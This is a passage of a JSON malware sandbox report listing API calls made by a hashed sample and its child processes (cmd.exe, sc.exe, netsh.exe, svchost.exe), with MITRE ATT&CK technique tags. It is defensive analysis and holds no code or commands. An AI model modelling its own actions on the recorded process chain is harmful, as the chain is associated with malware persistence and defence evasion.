00000000-00002876)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002876)\n \"evryposw.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004152)\n \"evryposw.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004152)\n \"evryposw.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00004152)\n \"evryposw.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00004152)\n \"evryposw.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004152)\n \"evryposw.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004152)\n \"evryposw.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004152)\n \"evryposw.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004152)\n \"evryposw.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00004152)\n \"evryposw.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00004152)\n \"evryposw.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004152)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\odbcint.dll (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter MSVCRT.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RASMONTR.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHWFP.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004612)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004612)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004740)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004740)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004740)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004740)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00004740)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00004740)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00004740)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004740)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00004740)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004740)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 